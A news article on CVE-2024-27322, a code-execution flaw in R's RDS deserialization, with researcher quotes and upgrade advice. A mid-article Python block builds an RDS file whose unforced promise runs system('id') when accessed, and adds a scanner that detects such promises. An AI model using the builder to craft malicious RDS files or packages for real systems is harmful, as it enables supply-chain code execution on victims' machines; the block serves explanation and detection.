URL: https://www.darkreading.com/application-security/r-programming-language-exposes-orgs-to-supply-chain-risk
R PROGRAMMING BUG EXPOSES ORGS TO VAST SUPPLY CHAIN RISK

The CVE-2024-27322 security vulnerability in R's deserialization process gives
attackers a way to execute arbitrary code in target environments via specially
crafted files.

Jai Vijayan, Contributing Writer

April 29, 2024



A high-severity vulnerability in the R programming language's deserialization
code could expose organizations using the popular open source language to
attacks via the software supply chain.

The vulnerability, assigned CVE-2024-27322, has a CVSS severity score of 8.8
out of 10. It lies in R's process for deserializing data: reading an object
back from its stored, serialized form into a live object in a running R
session. For R that stored form is the language's own binary R Data
Serialization (RDS) format rather than a text format such as JSON or XML.

R is a widely used language for statistical computing and graphics. It is
popular among developers in sectors such as financial services, healthcare,
research and government, and in environments involving large datasets such as
AI and machine learning. The Comprehensive R Archive Network (CRAN), the most
popular R package repository, currently hosts more than 20,000 packages, while
R-Forge, a site that provides R package development tools, has more than 15,800
registered members and hosts some 2,146 projects.


DESERIALIZATION ISSUE

Researchers at HiddenLayer found a weakness in R's process that gives attackers
a way to execute arbitrary code in a victim environment via a specially crafted
R Data Serialization (RDS) file. Programmers commonly use RDS files to store or
save objects in R for future use or for sharing with others.

"This vulnerability can be exploited through the loading of RDS files or R
packages, which are often shared between developers and data scientists,"
HiddenLayer researchers Kasimir Schulz and Kieran Evans said in a report this
week. "An attacker can create malicious RDS files or R packages containing
embedded arbitrary R code that executes on the victim’s target device upon
interaction," according to the report.



The R maintainers addressed the issue in R version 4.4.0 after HiddenLayer
reported it to them.


A LAZY PROMISE ALLOWS TINKERING

The vulnerability HiddenLayer discovered relates to two fundamental concepts in
R: "lazy evaluation" and "promise objects." Under lazy evaluation, R does not
evaluate an expression, a function argument for instance, until its value is
actually needed, which avoids computing results that may never be used. A
promise object is the mechanism behind lazy evaluation: it bundles the
unevaluated expression, the environment in which to evaluate it, and a value
slot that stays empty until the promise is first accessed ("forced"), after
which the cached value is returned on every later access.



What the researchers at HiddenLayer found was a way to serialize a promise
object whose value slot is still empty and whose expression is a payload of
their choice. Once an RDS file carrying such an object has been deserialized,
the first access to that object forces the promise and runs the payload.

"R packages leverage the RDS format to save and load data," according to
HiddenLayer. Two files that facilitate this process are an .rdb file that
contains all the serialized objects to be included in a package, and an .rdx
file that contains metadata about each of the objects.

"When a package is loaded, the metadata stored in the RDS format within the .rdx
file is used to locate the objects within the .rdb file," according to the
analysis. The objects within the .rdb files are then deserialized.

"An attacker can exploit this by creating an RDS file that contains a specially
crafted promise object embedded with arbitrary code," Schulz tells Dark Reading.
"Due to the way R implements lazy evaluation, the embedded arbitrary code will
be executed once a user has loaded the malicious file or package." An attacker
who manages to get a weaponized package into an R repository such as CRAN, or
who simply distributes a malicious RDS file, then only has to wait for an unwary
user to load it.
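The mechanism described above, as an added example that is neither HiddenLayer's proof of concept nor code from R itself: a Python script that writes the bytes R produces for an environment holding one unforced promise (the on-disk shape of delayedAssign() followed by saveRDS()), and a scanner that walks an RDS file without evaluating anything and reports every promise whose value slot is still unbound. The type codes, flag bits and special codes are those of R's src/main/serialize.c; the binding name x, the call system("id"), the function and class names (build_promise_rds, scan_rds, _Walker and the small helpers) and the wording of the finding are constructed for this example.

```python
# Added example (not HiddenLayer's proof of concept, not code from R): build the RDS bytes of an unforced
# promise and scan RDS files for them. Type codes, flag bits and special codes come from R's serialize.c.
import gzip
import struct

SYMSXP, LISTSXP, CLOSXP, ENVSXP, PROMSXP, LANGSXP, CHARSXP, LGLSXP, INTSXP = 1, 2, 3, 4, 5, 6, 9, 10, 13
REALSXP, CPLXSXP, STRSXP, DOTSXP, VECSXP, EXPRSXP, RAWSXP, S4SXP = 14, 15, 16, 17, 19, 20, 24, 25
REFSXP, NILVALUE_SXP, GLOBALENV_SXP, UNBOUNDVALUE_SXP, NAMESPACESXP, PACKAGESXP, ALTREP_SXP = 255, 254, 253, 252, 249, 248, 238
SPECIALS = {254, 253, 252, 251, 250, 242, 241}   # NULL, globalenv, unbound, missing arg, base ns, emptyenv, baseenv
HAS_ATTR, HAS_TAG = 1 << 9, 1 << 10              # packed above the 8-bit type in every flags word
ASCII_CHARSXP = CHARSXP | (64 << 12)             # CHARSXP flags word for a plain-ASCII string
ELEMENT_BYTES = {LGLSXP: 4, INTSXP: 4, REALSXP: 8, CPLXSXP: 16, RAWSXP: 1}

def xdr_int(v): return struct.pack(">i", v)

def charsxp(s):
    b = s.encode("ascii")
    return xdr_int(ASCII_CHARSXP) + xdr_int(len(b)) + b

def sym(name): return xdr_int(SYMSXP) + charsxp(name)

def build_promise_rds(binding, fn, arg, forced=False):
    """Bytes R writes for: e <- new.env(hash=FALSE); delayedAssign(binding, fn("arg"), assign.env=e); saveRDS(e, f)."""
    # PROMSXP is serialized as TAG = env, CAR = value, CDR = expression; an unbound CAR runs the CDR on first access.
    call = (xdr_int(LANGSXP) + sym(fn) + xdr_int(LISTSXP)
            + xdr_int(STRSXP) + xdr_int(1) + charsxp(arg) + xdr_int(NILVALUE_SXP))
    value = xdr_int(INTSXP) + xdr_int(1) + xdr_int(0) if forced else xdr_int(UNBOUNDVALUE_SXP)  # 0L once forced
    promise = xdr_int(PROMSXP | HAS_TAG) + xdr_int(GLOBALENV_SXP) + value + call
    frame = xdr_int(LISTSXP | HAS_TAG) + sym(binding) + promise + xdr_int(NILVALUE_SXP)
    env = (xdr_int(ENVSXP) + xdr_int(0) + xdr_int(GLOBALENV_SXP) + frame      # unlocked, enclosed by globalenv
           + xdr_int(NILVALUE_SXP) + xdr_int(NILVALUE_SXP))                    # no hash table, no attributes
    header = b"X\n" + xdr_int(3) + xdr_int(0x040300) + xdr_int(0x030500) + xdr_int(5) + b"UTF-8"  # v3, R 4.3.0
    return header + env

class _Walker:
    def __init__(self, data):
        self.d, self.p, self.refs, self.findings = data, 0, [], []

    def take(self, n):
        self.p += n
        return self.d[self.p - n:self.p]

    def i32(self):
        return struct.unpack(">i", self.take(4))[0]

    def length(self):  # WriteLENGTH: -1 marks a long vector, followed by two 32-bit halves
        n = self.i32()
        return (self.i32() << 32) | (self.i32() & 0xFFFFFFFF) if n == -1 else n

    def item(self, ctx):
        flags = self.i32()
        t, has_attr, has_tag = flags & 0xFF, bool(flags & HAS_ATTR), bool(flags & HAS_TAG)
        if t == REFSXP:
            return self.refs[((flags >> 8) or self.i32()) - 1]   # 1-based back-reference to a symbol/env
        if t in SPECIALS:
            return None
        if t == SYMSXP:
            self.refs.append(self.item(ctx))                      # PRINTNAME, then the symbol joins the ref table
            return self.refs[-1]
        if t in (ENVSXP, NAMESPACESXP, PACKAGESXP):
            self.refs.append(None)
            self.i32()                                            # locked flag, or placeholder 0
            for _ in range(4 if t == ENVSXP else self.i32()): self.item(ctx)  # enclos/frame/hashtab/attrib, or names
            return None
        if t == ALTREP_SXP:
            for _ in range(3): self.item(ctx)                     # class info, state, attributes
            return None
        if t in (LISTSXP, LANGSXP, CLOSXP, PROMSXP, DOTSXP):
            if has_attr: self.item(ctx)                           # pairlists carry attributes before the tag
            tag = self.item(ctx) if has_tag else None             # binding name, or env for CLOSXP/PROMSXP
            car_ctx = f"{ctx}${tag}" if t in (LISTSXP, DOTSXP) and tag else ctx
            if t == PROMSXP and (struct.unpack_from(">i", self.d, self.p)[0] & 0xFF) == UNBOUNDVALUE_SXP:
                self.findings.append(f"unforced promise at {ctx}: expression runs on first access")
            self.item(car_ctx)                                    # CAR: element / formals / PRVALUE
            self.item(ctx)                                        # CDR: next cell / body / PRCODE
            return None
        if t == CHARSXP:
            n = self.i32()                                        # -1 is NA_STRING
            return None if n == -1 else self.take(n).decode("utf-8", "replace")
        if t in ELEMENT_BYTES:
            self.take(ELEMENT_BYTES[t] * self.length())
        elif t in (STRSXP, VECSXP, EXPRSXP):
            for _ in range(self.length()): self.item(ctx)
        elif t != S4SXP:                                          # bytecode, external pointers, ...: fail closed
            raise ValueError(f"unsupported SEXP type {t} at {ctx}: cannot vouch for this file")
        if has_attr: self.item(ctx)                               # vectors carry attributes after the data
        return None

def scan_rds(data):
    """Findings for one RDS blob; [] means no unforced promise was seen."""
    if data[:2] == b"\x1f\x8b":                                   # saveRDS() gzips by default
        data = gzip.decompress(data)
    w = _Walker(data)
    if w.take(2) != b"X\n":
        raise ValueError("only XDR RDS handled; bzip2/xz-compressed files must be decompressed first")
    version, _writer, _min_reader = w.i32(), w.i32(), w.i32()
    if version == 3:
        w.take(w.i32())                                           # native encoding name
    elif version != 2:
        raise ValueError(f"unknown serialization version {version}")
    w.item("<root>")
    if w.p != len(data):
        raise ValueError("trailing bytes after the top-level object")
    return w.findings
```

On an R release before 4.4.0, e <- readRDS(f); e$x on the file produced by build_promise_rds("x", "system", "id") forces the promise and runs system("id"); scan_rds() reports that promise without starting R, and a promise whose value slot is already filled (forced=True) is not reported. Two caveats for anyone using such a check as a gate: saveRDS() gzip-compresses by default (handled here), but the .rdb lazy-load databases inside installed packages compress each object separately and need unpacking before this walker applies; and an R package can run arbitrary code at install and load time regardless of this bug (configure scripts, .onLoad hooks), so the scanner complements the advice to upgrade and to load only trusted packages rather than replacing it.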




POTENTIALLY VAST ATTACK SURFACE: MULTIPLE INFECTION SOURCES

Dozens of hubs, such as R-Forge and Bioconductor, let R developers share and
download packages. These hubs not only give developers access to thousands of
packages; some of them, like Bioconductor with more than 42 million downloads,
are in heavy regular use, Schulz says. "Someone just needs to take advantage of
the vulnerability and the massive open source space for R packages to affect
thousands of downstream users in a potentially massive supply chain attack," he
says.

Schulz recommends that organizations move to the latest version of R to mitigate
risk: "In addition, organizations should ensure that users of R are made aware
of current and potential future vulnerabilities of this nature and make it
policy to only use known trusted files and packages."



